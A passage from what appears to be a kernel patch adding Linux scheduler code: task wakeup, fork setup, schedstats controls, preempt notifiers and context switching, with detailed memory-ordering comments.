++ * If the task was not queued/runnable, also place it back on a runqueue.
++ *
++ * This function is atomic against schedule() which would dequeue the task.
++ *
++ * It issues a full memory barrier before accessing @p->state, see the comment
++ * with set_current_state().
++ *
++ * Uses p->pi_lock to serialize against concurrent wake-ups.
++ *
++ * Relies on p->pi_lock stabilizing:
++ *  - p->sched_class
++ *  - p->cpus_ptr
++ *  - p->sched_task_group
++ * in order to do migration, see its use of select_task_rq()/set_task_cpu().
++ *
++ * Tries really hard to only take one task_rq(p)->lock for performance.
++ * Takes rq->lock in:
++ *  - ttwu_runnable()    -- old rq, unavoidable, see comment there;
++ *  - ttwu_queue()       -- new rq, for enqueue of the task;
++ *  - psi_ttwu_dequeue() -- much sadness :-( accounting will kill us.
++ *
++ * As a consequence we race really badly with just about everything. See the
++ * many memory barriers and their comments for details.
++ *
++ * Return: %true if @p->state changes (an actual wakeup was done),
++ *	   %false otherwise.
++ */
++static int try_to_wake_up(struct task_struct *p, unsigned int state,
++			  int wake_flags)
++{
++	unsigned long flags;
++	int cpu, success = 0;
++
++	preempt_disable();
++	if (p == current) {
++		/*
++		 * We're waking current, this means 'p->on_rq' and 'task_cpu(p)
++		 * == smp_processor_id()'. Together this means we can special
++		 * case the whole 'p->on_rq && ttwu_runnable()' case below
++		 * without taking any locks.
++		 *
++		 * In particular:
++		 *  - we rely on Program-Order guarantees for all the ordering,
++		 *  - we're serialized against set_special_state() by virtue of
++		 *    it disabling IRQs (this allows not taking ->pi_lock).
++		 */
++		if (!ttwu_state_match(p, state, &success))
++			goto out;
++
++		trace_sched_waking(p);
++		WRITE_ONCE(p->__state, TASK_RUNNING);
++		trace_sched_wakeup(p);
++		goto out;
++	}
++
++	/*
++	 * If we are going to wake up a thread waiting for CONDITION we
++	 * need to ensure that CONDITION=1 done by the caller can not be
++	 * reordered with p->state check below. This pairs with smp_store_mb()
++	 * in set_current_state() that the waiting thread does.
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	smp_mb__after_spinlock();
++	if (!ttwu_state_match(p, state, &success))
++		goto unlock;
++
++	trace_sched_waking(p);
++
++	/*
++	 * Ensure we load p->on_rq _after_ p->state, otherwise it would
++	 * be possible to, falsely, observe p->on_rq == 0 and get stuck
++	 * in smp_cond_load_acquire() below.
++	 *
++	 * sched_ttwu_pending()			try_to_wake_up()
++	 *   STORE p->on_rq = 1			  LOAD p->state
++	 *   UNLOCK rq->lock
++	 *
++	 * __schedule() (switch to task 'p')
++	 *   LOCK rq->lock			  smp_rmb();
++	 *   smp_mb__after_spinlock();
++	 *   UNLOCK rq->lock
++	 *
++	 * [task p]
++	 *   STORE p->state = UNINTERRUPTIBLE	  LOAD p->on_rq
++	 *
++	 * Pairs with the LOCK+smp_mb__after_spinlock() on rq->lock in
++	 * __schedule().  See the comment for smp_mb__after_spinlock().
++	 *
++	 * A similar smb_rmb() lives in try_invoke_on_locked_down_task().
++	 */
++	smp_rmb();
++	if (READ_ONCE(p->on_rq) && ttwu_runnable(p, wake_flags))
++		goto unlock;
++
++#ifdef CONFIG_SMP
++	/*
++	 * Ensure we load p->on_cpu _after_ p->on_rq, otherwise it would be
++	 * possible to, falsely, observe p->on_cpu == 0.
++	 *
++	 * One must be running (->on_cpu == 1) in order to remove oneself
++	 * from the runqueue.
++	 *
++	 * __schedule() (switch to task 'p')	try_to_wake_up()
++	 *   STORE p->on_cpu = 1		  LOAD p->on_rq
++	 *   UNLOCK rq->lock
++	 *
++	 * __schedule() (put 'p' to sleep)
++	 *   LOCK rq->lock			  smp_rmb();
++	 *   smp_mb__after_spinlock();
++	 *   STORE p->on_rq = 0			  LOAD p->on_cpu
++	 *
++	 * Pairs with the LOCK+smp_mb__after_spinlock() on rq->lock in
++	 * __schedule().  See the comment for smp_mb__after_spinlock().
++	 *
++	 * Form a control-dep-acquire with p->on_rq == 0 above, to ensure
++	 * schedule()'s deactivate_task() has 'happened' and p will no longer
++	 * care about it's own p->state. See the comment in __schedule().
++	 */
++	smp_acquire__after_ctrl_dep();
++
++	/*
++	 * We're doing the wakeup (@success == 1), they did a dequeue (p->on_rq
++	 * == 0), which means we need to do an enqueue, change p->state to
++	 * TASK_WAKING such that we can unlock p->pi_lock before doing the
++	 * enqueue, such as ttwu_queue_wakelist().
++	 */
++	WRITE_ONCE(p->__state, TASK_WAKING);
++
++	/*
++	 * If the owning (remote) CPU is still in the middle of schedule() with
++	 * this task as prev, considering queueing p on the remote CPUs wake_list
++	 * which potentially sends an IPI instead of spinning on p->on_cpu to
++	 * let the waker make forward progress. This is safe because IRQs are
++	 * disabled and the IPI will deliver after on_cpu is cleared.
++	 *
++	 * Ensure we load task_cpu(p) after p->on_cpu:
++	 *
++	 * set_task_cpu(p, cpu);
++	 *   STORE p->cpu = @cpu
++	 * __schedule() (switch to task 'p')
++	 *   LOCK rq->lock
++	 *   smp_mb__after_spin_lock()          smp_cond_load_acquire(&p->on_cpu)
++	 *   STORE p->on_cpu = 1                LOAD p->cpu
++	 *
++	 * to ensure we observe the correct CPU on which the task is currently
++	 * scheduling.
++	 */
++	if (smp_load_acquire(&p->on_cpu) &&
++	    ttwu_queue_wakelist(p, task_cpu(p), wake_flags))
++		goto unlock;
++
++	/*
++	 * If the owning (remote) CPU is still in the middle of schedule() with
++	 * this task as prev, wait until it's done referencing the task.
++	 *
++	 * Pairs with the smp_store_release() in finish_task().
++	 *
++	 * This ensures that tasks getting woken will be fully ordered against
++	 * their previous state and preserve Program Order.
++	 */
++	smp_cond_load_acquire(&p->on_cpu, !VAL);
++
++	sched_task_ttwu(p);
++
++	cpu = select_task_rq(p);
++
++	if (cpu != task_cpu(p)) {
++		if (p->in_iowait) {
++			delayacct_blkio_end(p);
++			atomic_dec(&task_rq(p)->nr_iowait);
++		}
++
++		wake_flags |= WF_MIGRATED;
++		psi_ttwu_dequeue(p);
++		set_task_cpu(p, cpu);
++	}
++#else
++	cpu = task_cpu(p);
++#endif /* CONFIG_SMP */
++
++	ttwu_queue(p, cpu, wake_flags);
++unlock:
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++out:
++	if (success)
++		ttwu_stat(p, task_cpu(p), wake_flags);
++	preempt_enable();
++
++	return success;
++}
++
++static bool __task_needs_rq_lock(struct task_struct *p)
++{
++	unsigned int state = READ_ONCE(p->__state);
++
++	/*
++	 * Since pi->lock blocks try_to_wake_up(), we don't need rq->lock when
++	 * the task is blocked. Make sure to check @state since ttwu() can drop
++	 * locks at the end, see ttwu_queue_wakelist().
++	 */
++	if (state == TASK_RUNNING || state == TASK_WAKING)
++		return true;
++
++	/*
++	 * Ensure we load p->on_rq after p->__state, otherwise it would be
++	 * possible to, falsely, observe p->on_rq == 0.
++	 *
++	 * See try_to_wake_up() for a longer comment.
++	 */
++	smp_rmb();
++	if (p->on_rq)
++		return true;
++
++#ifdef CONFIG_SMP
++	/*
++	 * Ensure the task has finished __schedule() and will not be referenced
++	 * anymore. Again, see try_to_wake_up() for a longer comment.
++	 */
++	smp_rmb();
++	smp_cond_load_acquire(&p->on_cpu, !VAL);
++#endif
++
++	return false;
++}
++
++/**
++ * task_call_func - Invoke a function on task in fixed state
++ * @p: Process for which the function is to be invoked, can be @current.
++ * @func: Function to invoke.
++ * @arg: Argument to function.
++ *
++ * Fix the task in it's current state by avoiding wakeups and or rq operations
++ * and call @func(@arg) on it.  This function can use ->on_rq and task_curr()
++ * to work out what the state is, if required.  Given that @func can be invoked
++ * with a runqueue lock held, it had better be quite lightweight.
++ *
++ * Returns:
++ *   Whatever @func returns
++ */
++int task_call_func(struct task_struct *p, task_call_f func, void *arg)
++{
++	struct rq *rq = NULL;
++	struct rq_flags rf;
++	int ret;
++
++	raw_spin_lock_irqsave(&p->pi_lock, rf.flags);
++
++	if (__task_needs_rq_lock(p))
++		rq = __task_rq_lock(p, &rf);
++
++	/*
++	 * At this point the task is pinned; either:
++	 *  - blocked and we're holding off wakeups      (pi->lock)
++	 *  - woken, and we're holding off enqueue       (rq->lock)
++	 *  - queued, and we're holding off schedule     (rq->lock)
++	 *  - running, and we're holding off de-schedule (rq->lock)
++	 *
++	 * The called function (@func) can use: task_curr(), p->on_rq and
++	 * p->__state to differentiate between these states.
++	 */
++	ret = func(p, arg);
++
++	if (rq)
++		__task_rq_unlock(rq, &rf);
++
++	raw_spin_unlock_irqrestore(&p->pi_lock, rf.flags);
++	return ret;
++}
++
++/**
++ * cpu_curr_snapshot - Return a snapshot of the currently running task
++ * @cpu: The CPU on which to snapshot the task.
++ *
++ * Returns the task_struct pointer of the task "currently" running on
++ * the specified CPU.  If the same task is running on that CPU throughout,
++ * the return value will be a pointer to that task's task_struct structure.
++ * If the CPU did any context switches even vaguely concurrently with the
++ * execution of this function, the return value will be a pointer to the
++ * task_struct structure of a randomly chosen task that was running on
++ * that CPU somewhere around the time that this function was executing.
++ *
++ * If the specified CPU was offline, the return value is whatever it
++ * is, perhaps a pointer to the task_struct structure of that CPU's idle
++ * task, but there is no guarantee.  Callers wishing a useful return
++ * value must take some action to ensure that the specified CPU remains
++ * online throughout.
++ *
++ * This function executes full memory barriers before and after fetching
++ * the pointer, which permits the caller to confine this function's fetch
++ * with respect to the caller's accesses to other shared variables.
++ */
++struct task_struct *cpu_curr_snapshot(int cpu)
++{
++	struct task_struct *t;
++
++	smp_mb(); /* Pairing determined by caller's synchronization design. */
++	t = rcu_dereference(cpu_curr(cpu));
++	smp_mb(); /* Pairing determined by caller's synchronization design. */
++	return t;
++}
++
++/**
++ * wake_up_process - Wake up a specific process
++ * @p: The process to be woken up.
++ *
++ * Attempt to wake up the nominated process and move it to the set of runnable
++ * processes.
++ *
++ * Return: 1 if the process was woken up, 0 if it was already running.
++ *
++ * This function executes a full memory barrier before accessing the task state.
++ */
++int wake_up_process(struct task_struct *p)
++{
++	return try_to_wake_up(p, TASK_NORMAL, 0);
++}
++EXPORT_SYMBOL(wake_up_process);
++
++int wake_up_state(struct task_struct *p, unsigned int state)
++{
++	return try_to_wake_up(p, state, 0);
++}
++
++/*
++ * Perform scheduler related setup for a newly forked process p.
++ * p is forked by current.
++ *
++ * __sched_fork() is basic setup used by init_idle() too:
++ */
++static inline void __sched_fork(unsigned long clone_flags, struct task_struct *p)
++{
++	p->on_rq			= 0;
++	p->on_cpu			= 0;
++	p->utime			= 0;
++	p->stime			= 0;
++	p->sched_time			= 0;
++
++#ifdef CONFIG_SCHEDSTATS
++	/* Even if schedstat is disabled, there should not be garbage */
++	memset(&p->stats, 0, sizeof(p->stats));
++#endif
++
++#ifdef CONFIG_PREEMPT_NOTIFIERS
++	INIT_HLIST_HEAD(&p->preempt_notifiers);
++#endif
++
++#ifdef CONFIG_COMPACTION
++	p->capture_control = NULL;
++#endif
++#ifdef CONFIG_SMP
++	p->wake_entry.u_flags = CSD_TYPE_TTWU;
++#endif
++}
++
++/*
++ * fork()/clone()-time setup:
++ */
++int sched_fork(unsigned long clone_flags, struct task_struct *p)
++{
++	__sched_fork(clone_flags, p);
++	/*
++	 * We mark the process as NEW here. This guarantees that
++	 * nobody will actually run it, and a signal or other external
++	 * event cannot wake it up and insert it on the runqueue either.
++	 */
++	p->__state = TASK_NEW;
++
++	/*
++	 * Make sure we do not leak PI boosting priority to the child.
++	 */
++	p->prio = current->normal_prio;
++
++	/*
++	 * Revert to default priority/policy on fork if requested.
++	 */
++	if (unlikely(p->sched_reset_on_fork)) {
++		if (task_has_rt_policy(p)) {
++			p->policy = SCHED_NORMAL;
++			p->static_prio = NICE_TO_PRIO(0);
++			p->rt_priority = 0;
++		} else if (PRIO_TO_NICE(p->static_prio) < 0)
++			p->static_prio = NICE_TO_PRIO(0);
++
++		p->prio = p->normal_prio = p->static_prio;
++
++		/*
++		 * We don't need the reset flag anymore after the fork. It has
++		 * fulfilled its duty:
++		 */
++		p->sched_reset_on_fork = 0;
++	}
++
++#ifdef CONFIG_SCHED_INFO
++	if (unlikely(sched_info_on()))
++		memset(&p->sched_info, 0, sizeof(p->sched_info));
++#endif
++	init_task_preempt_count(p);
++
++	return 0;
++}
++
++void sched_cgroup_fork(struct task_struct *p, struct kernel_clone_args *kargs)
++{
++	unsigned long flags;
++	struct rq *rq;
++
++	/*
++	 * Because we're not yet on the pid-hash, p->pi_lock isn't strictly
++	 * required yet, but lockdep gets upset if rules are violated.
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	/*
++	 * Share the timeslice between parent and child, thus the
++	 * total amount of pending timeslices in the system doesn't change,
++	 * resulting in more scheduling fairness.
++	 */
++	rq = this_rq();
++	raw_spin_lock(&rq->lock);
++
++	rq->curr->time_slice /= 2;
++	p->time_slice = rq->curr->time_slice;
++#ifdef CONFIG_SCHED_HRTICK
++	hrtick_start(rq, rq->curr->time_slice);
++#endif
++
++	if (p->time_slice < RESCHED_NS) {
++		p->time_slice = sched_timeslice_ns;
++		resched_curr(rq);
++	}
++	sched_task_fork(p, rq);
++	raw_spin_unlock(&rq->lock);
++
++	rseq_migrate(p);
++	/*
++	 * We're setting the CPU for the first time, we don't migrate,
++	 * so use __set_task_cpu().
++	 */
++	__set_task_cpu(p, smp_processor_id());
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++}
++
++void sched_post_fork(struct task_struct *p)
++{
++}
++
++#ifdef CONFIG_SCHEDSTATS
++
++DEFINE_STATIC_KEY_FALSE(sched_schedstats);
++
++static void set_schedstats(bool enabled)
++{
++	if (enabled)
++		static_branch_enable(&sched_schedstats);
++	else
++		static_branch_disable(&sched_schedstats);
++}
++
++void force_schedstat_enabled(void)
++{
++	if (!schedstat_enabled()) {
++		pr_info("kernel profiling enabled schedstats, disable via kernel.sched_schedstats.\n");
++		static_branch_enable(&sched_schedstats);
++	}
++}
++
++static int __init setup_schedstats(char *str)
++{
++	int ret = 0;
++	if (!str)
++		goto out;
++
++	if (!strcmp(str, "enable")) {
++		set_schedstats(true);
++		ret = 1;
++	} else if (!strcmp(str, "disable")) {
++		set_schedstats(false);
++		ret = 1;
++	}
++out:
++	if (!ret)
++		pr_warn("Unable to parse schedstats=\n");
++
++	return ret;
++}
++__setup("schedstats=", setup_schedstats);
++
++#ifdef CONFIG_PROC_SYSCTL
++static int sysctl_schedstats(struct ctl_table *table, int write, void *buffer,
++		size_t *lenp, loff_t *ppos)
++{
++	struct ctl_table t;
++	int err;
++	int state = static_branch_likely(&sched_schedstats);
++
++	if (write && !capable(CAP_SYS_ADMIN))
++		return -EPERM;
++
++	t = *table;
++	t.data = &state;
++	err = proc_dointvec_minmax(&t, write, buffer, lenp, ppos);
++	if (err < 0)
++		return err;
++	if (write)
++		set_schedstats(state);
++	return err;
++}
++
++static struct ctl_table sched_core_sysctls[] = {
++	{
++		.procname       = "sched_schedstats",
++		.data           = NULL,
++		.maxlen         = sizeof(unsigned int),
++		.mode           = 0644,
++		.proc_handler   = sysctl_schedstats,
++		.extra1         = SYSCTL_ZERO,
++		.extra2         = SYSCTL_ONE,
++	},
++	{}
++};
++static int __init sched_core_sysctl_init(void)
++{
++	register_sysctl_init("kernel", sched_core_sysctls);
++	return 0;
++}
++late_initcall(sched_core_sysctl_init);
++#endif /* CONFIG_PROC_SYSCTL */
++#endif /* CONFIG_SCHEDSTATS */
++
++/*
++ * wake_up_new_task - wake up a newly created task for the first time.
++ *
++ * This function will do some initial scheduler statistics housekeeping
++ * that must be done for every newly created context, then puts the task
++ * on the runqueue and wakes it.
++ */
++void wake_up_new_task(struct task_struct *p)
++{
++	unsigned long flags;
++	struct rq *rq;
++
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	WRITE_ONCE(p->__state, TASK_RUNNING);
++	rq = cpu_rq(select_task_rq(p));
++#ifdef CONFIG_SMP
++	rseq_migrate(p);
++	/*
++	 * Fork balancing, do it here and not earlier because:
++	 * - cpus_ptr can change in the fork path
++	 * - any previously selected CPU might disappear through hotplug
++	 *
++	 * Use __set_task_cpu() to avoid calling sched_class::migrate_task_rq,
++	 * as we're not fully set-up yet.
++	 */
++	__set_task_cpu(p, cpu_of(rq));
++#endif
++
++	raw_spin_lock(&rq->lock);
++	update_rq_clock(rq);
++
++	activate_task(p, rq);
++	trace_sched_wakeup_new(p);
++	check_preempt_curr(rq);
++
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++}
++
++#ifdef CONFIG_PREEMPT_NOTIFIERS
++
++static DEFINE_STATIC_KEY_FALSE(preempt_notifier_key);
++
++void preempt_notifier_inc(void)
++{
++	static_branch_inc(&preempt_notifier_key);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_inc);
++
++void preempt_notifier_dec(void)
++{
++	static_branch_dec(&preempt_notifier_key);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_dec);
++
++/**
++ * preempt_notifier_register - tell me when current is being preempted & rescheduled
++ * @notifier: notifier struct to register
++ */
++void preempt_notifier_register(struct preempt_notifier *notifier)
++{
++	if (!static_branch_unlikely(&preempt_notifier_key))
++		WARN(1, "registering preempt_notifier while notifiers disabled\n");
++
++	hlist_add_head(&notifier->link, &current->preempt_notifiers);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_register);
++
++/**
++ * preempt_notifier_unregister - no longer interested in preemption notifications
++ * @notifier: notifier struct to unregister
++ *
++ * This is *not* safe to call from within a preemption notifier.
++ */
++void preempt_notifier_unregister(struct preempt_notifier *notifier)
++{
++	hlist_del(&notifier->link);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_unregister);
++
++static void __fire_sched_in_preempt_notifiers(struct task_struct *curr)
++{
++	struct preempt_notifier *notifier;
++
++	hlist_for_each_entry(notifier, &curr->preempt_notifiers, link)
++		notifier->ops->sched_in(notifier, raw_smp_processor_id());
++}
++
++static __always_inline void fire_sched_in_preempt_notifiers(struct task_struct *curr)
++{
++	if (static_branch_unlikely(&preempt_notifier_key))
++		__fire_sched_in_preempt_notifiers(curr);
++}
++
++static void
++__fire_sched_out_preempt_notifiers(struct task_struct *curr,
++				   struct task_struct *next)
++{
++	struct preempt_notifier *notifier;
++
++	hlist_for_each_entry(notifier, &curr->preempt_notifiers, link)
++		notifier->ops->sched_out(notifier, next);
++}
++
++static __always_inline void
++fire_sched_out_preempt_notifiers(struct task_struct *curr,
++				 struct task_struct *next)
++{
++	if (static_branch_unlikely(&preempt_notifier_key))
++		__fire_sched_out_preempt_notifiers(curr, next);
++}
++
++#else /* !CONFIG_PREEMPT_NOTIFIERS */
++
++static inline void fire_sched_in_preempt_notifiers(struct task_struct *curr)
++{
++}
++
++static inline void
++fire_sched_out_preempt_notifiers(struct task_struct *curr,
++				 struct task_struct *next)
++{
++}
++
++#endif /* CONFIG_PREEMPT_NOTIFIERS */
++
++static inline void prepare_task(struct task_struct *next)
++{
++	/*
++	 * Claim the task as running, we do this before switching to it
++	 * such that any running task will have this set.
++	 *
++	 * See the smp_load_acquire(&p->on_cpu) case in ttwu() and
++	 * its ordering comment.
++	 */
++	WRITE_ONCE(next->on_cpu, 1);
++}
++
++static inline void finish_task(struct task_struct *prev)
++{
++#ifdef CONFIG_SMP
++	/*
++	 * This must be the very last reference to @prev from this CPU. After
++	 * p->on_cpu is cleared, the task can be moved to a different CPU. We
++	 * must ensure this doesn't happen until the switch is completely
++	 * finished.
++	 *
++	 * In particular, the load of prev->state in finish_task_switch() must
++	 * happen before this.
++	 *
++	 * Pairs with the smp_cond_load_acquire() in try_to_wake_up().
++	 */
++	smp_store_release(&prev->on_cpu, 0);
++#else
++	prev->on_cpu = 0;
++#endif
++}
++
++#ifdef CONFIG_SMP
++
++static void do_balance_callbacks(struct rq *rq, struct balance_callback *head)
++{
++	void (*func)(struct rq *rq);
++	struct balance_callback *next;
++
++	lockdep_assert_held(&rq->lock);
++
++	while (head) {
++		func = (void (*)(struct rq *))head->func;
++		next = head->next;
++		head->next = NULL;
++		head = next;
++
++		func(rq);
++	}
++}
++
++static void balance_push(struct rq *rq);
++
++/*
++ * balance_push_callback is a right abuse of the callback interface and plays
++ * by significantly different rules.
++ *
++ * Where the normal balance_callback's purpose is to be ran in the same context
++ * that queued it (only later, when it's safe to drop rq->lock again),
++ * balance_push_callback is specifically targeted at __schedule().
++ *
++ * This abuse is tolerated because it places all the unlikely/odd cases behind
++ * a single test, namely: rq->balance_callback == NULL.
++ */
++struct balance_callback balance_push_callback = {
++	.next = NULL,
++	.func = balance_push,
++};
++
++static inline struct balance_callback *
++__splice_balance_callbacks(struct rq *rq, bool split)
++{
++	struct balance_callback *head = rq->balance_callback;
++
++	if (likely(!head))
++		return NULL;
++
++	lockdep_assert_rq_held(rq);
++	/*
++	 * Must not take balance_push_callback off the list when
++	 * splice_balance_callbacks() and balance_callbacks() are not
++	 * in the same rq->lock section.
++	 *
++	 * In that case it would be possible for __schedule() to interleave
++	 * and observe the list empty.
++	 */
++	if (split && head == &balance_push_callback)
++		head = NULL;
++	else
++		rq->balance_callback = NULL;
++
++	return head;
++}
++
++static inline struct balance_callback *splice_balance_callbacks(struct rq *rq)
++{
++	return __splice_balance_callbacks(rq, true);
++}
++
++static void __balance_callbacks(struct rq *rq)
++{
++	do_balance_callbacks(rq, __splice_balance_callbacks(rq, false));
++}
++
++static inline void balance_callbacks(struct rq *rq, struct balance_callback *head)
++{
++	unsigned long flags;
++
++	if (unlikely(head)) {
++		raw_spin_lock_irqsave(&rq->lock, flags);
++		do_balance_callbacks(rq, head);
++		raw_spin_unlock_irqrestore(&rq->lock, flags);
++	}
++}
++
++#else
++
++static inline void __balance_callbacks(struct rq *rq)
++{
++}
++
++static inline struct balance_callback *splice_balance_callbacks(struct rq *rq)
++{
++	return NULL;
++}
++
++static inline void balance_callbacks(struct rq *rq, struct balance_callback *head)
++{
++}
++
++#endif
++
++static inline void
++prepare_lock_switch(struct rq *rq, struct task_struct *next)
++{
++	/*
++	 * Since the runqueue lock will be released by the next
++	 * task (which is an invalid locking op but in the case
++	 * of the scheduler it's an obvious special-case), so we
++	 * do an early lockdep release here:
++	 */
++	spin_release(&rq->lock.dep_map, _THIS_IP_);
++#ifdef CONFIG_DEBUG_SPINLOCK
++	/* this is a valid case when another task releases the spinlock */
++	rq->lock.owner = next;
++#endif
++}
++
++static inline void finish_lock_switch(struct rq *rq)
++{
++	/*
++	 * If we are tracking spinlock dependencies then we have to
++	 * fix up the runqueue lock - which gets 'carried over' from
++	 * prev into current:
++	 */
++	spin_acquire(&rq->lock.dep_map, 0, 0, _THIS_IP_);
++	__balance_callbacks(rq);
++	raw_spin_unlock_irq(&rq->lock);
++}
++
++/*
++ * NOP if the arch has not defined these:
++ */
++
++#ifndef prepare_arch_switch
++# define prepare_arch_switch(next)	do { } while (0)
++#endif
++
++#ifndef finish_arch_post_lock_switch
++# define finish_arch_post_lock_switch()	do { } while (0)
++#endif
++
++static inline void kmap_local_sched_out(void)
++{
++#ifdef CONFIG_KMAP_LOCAL
++	if (unlikely(current->kmap_ctrl.idx))
++		__kmap_local_sched_out();
++#endif
++}
++
++static inline void kmap_local_sched_in(void)
++{
++#ifdef CONFIG_KMAP_LOCAL
++	if (unlikely(current->kmap_ctrl.idx))
++		__kmap_local_sched_in();
++#endif
++}
++
++/**
++ * prepare_task_switch - prepare to switch tasks
++ * @rq: the runqueue preparing to switch
++ * @next: the task we are going to switch to.
++ *
++ * This is called with the rq lock held and interrupts off. It must
++ * be paired with a subsequent finish_task_switch after the context
++ * switch.
++ *
++ * prepare_task_switch sets up locking and calls architecture specific
++ * hooks.
++ */
++static inline void
++prepare_task_switch(struct rq *rq, struct task_struct *prev,
++		    struct task_struct *next)
++{
++	kcov_prepare_switch(prev);
++	sched_info_switch(rq, prev, next);
++	perf_event_task_sched_out(prev, next);
++	rseq_preempt(prev);
++	fire_sched_out_preempt_notifiers(prev, next);
++	kmap_local_sched_out();
++	prepare_task(next);
++	prepare_arch_switch(next);
++}
++
++/**
++ * finish_task_switch - clean up after a task-switch
++ * @rq: runqueue associated with task-switch
++ * @prev: the thread we just switched away from.
++ *
++ * finish_task_switch must be called after the context switch, paired
++ * with a prepare_task_switch call before the context switch.
++ * finish_task_switch will reconcile locking set up by prepare_task_switch,
++ * and do any other architecture-specific cleanup actions.
++ *
++ * Note that we may have delayed dropping an mm in context_switch(). If
++ * so, we finish that here outside of the runqueue lock.  (Doing it
++ * with the lock held can cause deadlocks; see schedule() for
++ * details.)
++ *
++ * The context switch have flipped the stack from under us and restored the
++ * local variables which were saved when this task called schedule() in the
++ * past. prev == current is still correct but we need to recalculate this_rq
++ * because prev may have moved to another CPU.
++ */
++static struct rq *finish_task_switch(struct task_struct *prev)
++	__releases(rq->lock)
++{
++	struct rq *rq = this_rq();
++	struct mm_struct *mm = rq->prev_mm;
++	unsigned int prev_state;
++
++	/*
++	 * The previous task will have left us with a preempt_count of 2
++	 * because it left us after:
++	 *
++	 *	schedule()
++	 *	  preempt_disable();			// 1
++	 *	  __schedule()
++	 *	    raw_spin_lock_irq(&rq->lock)	// 2
++	 *
++	 * Also, see FORK_PREEMPT_COUNT.
++	 */
++	if (WARN_ONCE(preempt_count() != 2*PREEMPT_DISABLE_OFFSET,
++		      "corrupted preempt_count: %s/%d/0x%x\n",
++		      current->comm, current->pid, preempt_count()))
++		preempt_count_set(FORK_PREEMPT_COUNT);
++
++	rq->prev_mm = NULL;
++
++	/*
++	 * A task struct has one reference for the use as "current".
++	 * If a task dies, then it sets TASK_DEAD in tsk->state and calls
++	 * schedule one last time. The schedule call will never return, and
++	 * the scheduled task must drop that reference.
++	 *
++	 * We must observe prev->state before clearing prev->on_cpu (in
++	 * finish_task), otherwise a concurrent wakeup can get prev
++	 * running on another CPU and we could rave with its RUNNING -> DEAD
++	 * transition, resulting in a double drop.
++	 */
++	prev_state = READ_ONCE(prev->__state);
++	vtime_task_switch(prev);
++	perf_event_task_sched_in(prev, current);
++	finish_task(prev);
++	tick_nohz_task_switch();
++	finish_lock_switch(rq);
++	finish_arch_post_lock_switch();
++	kcov_finish_switch(current);
++	/*
++	 * kmap_local_sched_out() is invoked with rq::lock held and
++	 * interrupts disabled. There is no requirement for that, but the
++	 * sched out code does not have an interrupt enabled section.
++	 * Restoring the maps on sched in does not require interrupts being
++	 * disabled either.
++	 */
++	kmap_local_sched_in();
++
++	fire_sched_in_preempt_notifiers(current);
++	/*
++	 * When switching through a kernel thread, the loop in
++	 * membarrier_{private,global}_expedited() may have observed that
++	 * kernel thread and not issued an IPI. It is therefore possible to
++	 * schedule between user->kernel->user threads without passing though
++	 * switch_mm(). Membarrier requires a barrier after storing to
++	 * rq->curr, before returning to userspace, so provide them here:
++	 *
++	 * - a full memory barrier for {PRIVATE,GLOBAL}_EXPEDITED, implicitly
++	 *   provided by mmdrop(),
++	 * - a sync_core for SYNC_CORE.
++	 */
++	if (mm) {
++		membarrier_mm_sync_core_before_usermode(mm);
++		mmdrop_sched(mm);
++	}
++	if (unlikely(prev_state == TASK_DEAD)) {
++		/* Task is done with its stack. */
++		put_task_stack(prev);
++
++		put_task_struct_rcu_user(prev);
++	}
++
++	return rq;
++}
++
++/**
++ * schedule_tail - first thing a freshly forked thread must call.
++ * @prev: the thread we just switched away from.
++ */
++asmlinkage __visible void schedule_tail(struct task_struct *prev)
++	__releases(rq->lock)
++{
++	/*
++	 * New tasks start with FORK_PREEMPT_COUNT, see there and
++	 * finish_task_switch() for details.
++	 *
++	 * finish_task_switch() will drop rq->lock() and lower preempt_count
++	 * and the preempt_enable() will end up enabling preemption (on
++	 * PREEMPT_COUNT kernels).
++	 */
++
++	finish_task_switch(prev);
++	preempt_enable();
++
++	if (current->set_child_tid)
++		put_user(task_pid_vnr(current), current->set_child_tid);
++
++	calculate_sigpending();
++}
++
++/*
++ * context_switch - switch to the new MM and the new thread's register state.
++ */
++static __always_inline struct rq *
++context_switch(struct rq *rq, struct task_struct *prev,
++	       struct task_struct *next)
++{
++	prepare_task_switch(rq, prev, next);
++
++	/*
++	 * For paravirt, this is coupled with an exit in switch_to to
++	 * combine the page table reload and the switch backend into
++	 * one hypercall.
++	 */
++	arch_start_context_switch(prev);
++
++	/*
++	 * kernel -> kernel   lazy + transfer active
++	 *   user -> kernel   lazy + mmgrab() active
++	 *
++	 * kernel ->   user   switch + mmdrop() active
++	 *   user ->   user   switch
++	 */
++	if (!next->mm) {                                // to kernel
++		enter_lazy_tlb(prev->active_mm, next);
++
++		next->active_mm = prev->active_mm;
++		if (prev->mm)                           // from user
++			mmgrab(prev->active_mm);
++		else
++			prev->active_mm = NULL;
++	} else {                                        // to user
++		membarrier_switch_mm(rq, prev->active_mm, next->mm);
++		/*
++		 * sys_membarrier() requires an smp_mb() between setting
++		 * rq->curr / membarrier_switch_mm() and returning to userspace.
++		 *
++		 * The below provides this either through switch_mm(), or in
++		 * case 'prev->active_mm == next->mm' through
++		 * finish_task_switch()'s mmdrop().
++		 */
++		switch_mm_irqs_off(prev->active_mm, next->mm, next);
++		lru_gen_use_mm(next->mm);
++
++		if (!prev->mm) {                        // from kernel
++			/* will mmdrop() in finish_task_switch(). */
++			rq->prev_mm = prev->active_mm;
++			prev->active_mm = NULL;
++		}
++	}
++
++	prepare_lock_switch(rq, next);
++
++	/* Here we just switch the register state and the stack. */
++	switch_to(prev, next, prev);
++	barrier();
++
++	return finish_task_switch(prev);
++}
++
++/*
++ * nr_running, nr_uninterruptible and nr_context_switches:
++ *
++ * externally visible scheduler statistics: current number of runnable
++ * threads, total number of context switches performed since bootup.
++ */
++unsigned int nr_running(void)
++{
++	unsigned int i, sum = 0;
++
++	for_each_online_cpu(i)
++		sum += cpu_rq(i)->nr_running;
++
++	return sum;
++}
++
++/*
++ * Check if only the current task is running on the CPU.
++ *
++ * Caution: this function does not check that the caller has disabled
++ * preemption, thus the result might have a time-of-check-to-time-of-use
